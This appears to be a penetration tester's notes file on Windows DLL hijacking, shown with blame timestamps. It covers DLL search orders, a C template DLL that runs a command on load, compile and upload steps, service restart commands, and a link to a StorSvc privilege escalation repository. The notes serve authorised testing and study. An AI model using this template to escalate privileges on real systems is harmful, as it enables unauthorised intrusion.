2022-11-13 22:38:01 +01:00
|
|
|
# DLL Hijacking
|
|
|
|
|
|
2023-02-25 20:40:13 +01:00
|
|
|
## Basics
|
|
|
|
|
|
|
|
|
|
### Search Orders
|
2022-11-13 22:38:01 +01:00
|
|
|
* __SafeDllSearchMode__ enabled searches paths in following order:
|
|
|
|
|
* __cwd__ of executable
|
|
|
|
|
* System directory, `GetSystemDirectory`
|
|
|
|
|
* 16-bit system directory
|
|
|
|
|
* Windows, `GetWindowsDirectory`
|
|
|
|
|
* __pwd__
|
|
|
|
|
* PATH
|
|
|
|
|
|
|
|
|
|
* __SafeDllSearchMode__ disabled searches in following order:
|
|
|
|
|
* __cwd__ of executable
|
|
|
|
|
* __pwd__
|
|
|
|
|
* System directory
|
|
|
|
|
* 16-bit system directory
|
|
|
|
|
* Windows directory
|
|
|
|
|
* PATH environment variable
|
|
|
|
|
|
2023-02-25 20:40:13 +01:00
|
|
|
### Template
|
2022-11-13 22:38:01 +01:00
|
|
|
```C
|
|
|
|
|
#include <windows.h>
|
|
|
|
|
|
|
|
|
|
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
|
|
|
|
|
if (dwReason == DLL_PROCESS_ATTACH) {
|
|
|
|
|
system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
|
|
|
|
|
ExitProcess(0);
|
|
|
|
|
}
|
|
|
|
|
return TRUE;
|
|
|
|
|
}
|
|
|
|
|
```
|
|
|
|
|
* Compilation via
|
|
|
|
|
```sh
|
|
|
|
|
x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
|
|
|
|
|
```
|
|
|
|
|
* Upload to target
|
|
|
|
|
* Restart dllsvervice via
|
|
|
|
|
```sh
|
|
|
|
|
sc stop dllsvc
|
|
|
|
|
sc start dllsvc
|
|
|
|
|
```
|
|
|
|
|
|
2023-02-25 20:40:13 +01:00
|
|
|
## LPE via StorSvc
|
|
|
|
|
|
|
|
|
|
* [BlackArrowSec's repository](https://t.co/8XMvewhgFn)
|
|
|
|
|
|
